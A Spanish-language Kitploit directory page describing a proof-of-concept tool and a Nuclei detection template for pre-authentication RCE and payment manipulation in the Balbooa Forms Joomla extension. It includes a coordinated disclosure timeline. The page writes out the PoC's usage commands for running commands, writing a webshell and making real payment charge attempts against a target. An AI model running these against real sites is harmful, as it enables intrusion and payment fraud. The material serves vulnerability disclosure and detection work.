Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2026-67363-67364 — PoC y plantillas de detección para RCE sin autenticación y manipulación de pagos en Balbooa Forms (Joomla), incluyendo exploit en Python y plantilla de detección de Nuclei. | Kitploit
Herramientas/GitHubGitHub/lulztigre/cve-2026-67363-67364
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónDesarrollo de Payloads
GitHublulztigre/cve-2026-67363-67364

cve-2026-67363-67364

PoC y plantillas de detección para RCE sin autenticación y manipulación de pagos en Balbooa Forms (Joomla), incluyendo exploit en Python y plantilla de detección de Nuclei.

Ver Repositorio
6hace 20 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Balbooa Forms RCE pre-autenticación + Manipulación de Pagos (CVE-2026-67364 / CVE-2026-67363)

PoC y plantillas de detección para dos vulnerabilidades pre-autenticación en Balbooa Forms (com_baforms) para Joomla, corregidas en 2.4.3.2.

  • CVE-2026-67364 — Inyección de Código PHP pre-autenticación -> RCE (CVSS 9.8)
  • CVE-2026-67363 — Manipulación del Monto de Pago pre-autenticación (Stripe / Authorize.net)

Descubiertas por Lulztigre, divulgación coordinada a través del Joomla Security Strike Team (JSST), publicadas el 2026-08-19. Informe completo: https://lulztigre.pw/posts/balbooa-forms-penny-rce-67363-67364.html

Archivos

ArchivoPropósito
balbooa_forms_poc.pyPoC en Python, solo stdlib, cubre ambos CVEs
CVE-2026-67364.yamlPlantilla de Nuclei, detección no destructiva del RCE por eval

PoC en Python

Cero dependencias (Python 3.8+). Los modos rce y detect no escriben archivos ni realizan cargos reales; shell y pay son opcionales y están pensados para uso en laboratorio.

root@kitploit:~
# 1. Encontrar un par (form-id, submit-btn) vulnerable. No destructivo: cada sonda es una
#    sumisión anónima con un payload de marcador de eco.
python3 balbooa_forms_poc.py http://target detect --form-max 3 --btn-max 10

# 2. Demostrar ejecución de comandos. La salida regresa en la respuesta HTTP, sin persistencia.
python3 balbooa_forms_poc.py http://target rce --form 1 --btn 7 --cmd id

# 3. Prueba clásica de webshell (solo laboratorio - escribe images/shell.php)
python3 balbooa_forms_poc.py http://target shell --form 1 --btn 7

# 4. Manipulación del monto de pago (solo laboratorio - realiza intentos de cargo REALES; requiere --authorize)
python3 balbooa_forms_poc.py http://target pay --authorize --total 0.01

Código de salida 0 = vulnerable/explotado, 1 = limpio o fallido, 2 = error de uso.

Notas:

  • El RCE por eval requiere la condición previa administrativa documentada: un botón de envío con un manejador PHP personalizado que haga referencia a [Parámetro de URL = X], y sin reCAPTCHA en el botón.
  • --insecure omite la verificación TLS para objetivos HTTPS con certificados autofirmados.
  • Las versiones antiguas de Joomla pueden no requerir el token CSRF en absoluto; el PoC continúa sin él cuando el endpoint del token se comporta mal.

Plantilla de Nuclei

Solo detección: extrae el token CSRF anónimo, luego barre rangos pequeños de form/btn con un payload de marcador de eco y coincide el marcador en la respuesta. No escribe archivos, no realiza cargos reales.

root@kitploit:~
nuclei -t CVE-2026-67364.yaml -u http://target -v

Verificada contra nuclei v3.11.1 (Windows + Linux): extracción de token, barrido de 30 pares (form-id 1..3 x submit-btn 1..10, clusterbomb), 1 coincidencia crítica en el par vulnerable. Añade -duc en equipos sin conexión para omitir la comprobación de actualizaciones. El barrido es deliberadamente pequeño; aumenta los rangos de payload si un objetivo aloja más formularios. La manipulación de pagos (CVE-2026-67363) NO está automatizada intencionalmente en nuclei: cada sonda es un intento de cargo real contra la pasarela del comerciante.

Cronología de divulgación

  • 2026-08-13: proveedor notificado (Balbooa, [email protected])
  • 2026-08-13: solicitud de CVE presentada ante JSST ([email protected])
  • 2026-08-19: ambos registros publicados, corregidos en 2.4.3.2 (Actualización de Endurecimiento de Seguridad)

Úsalo solo contra sistemas que estés autorizado a probar.

Descargar herramienta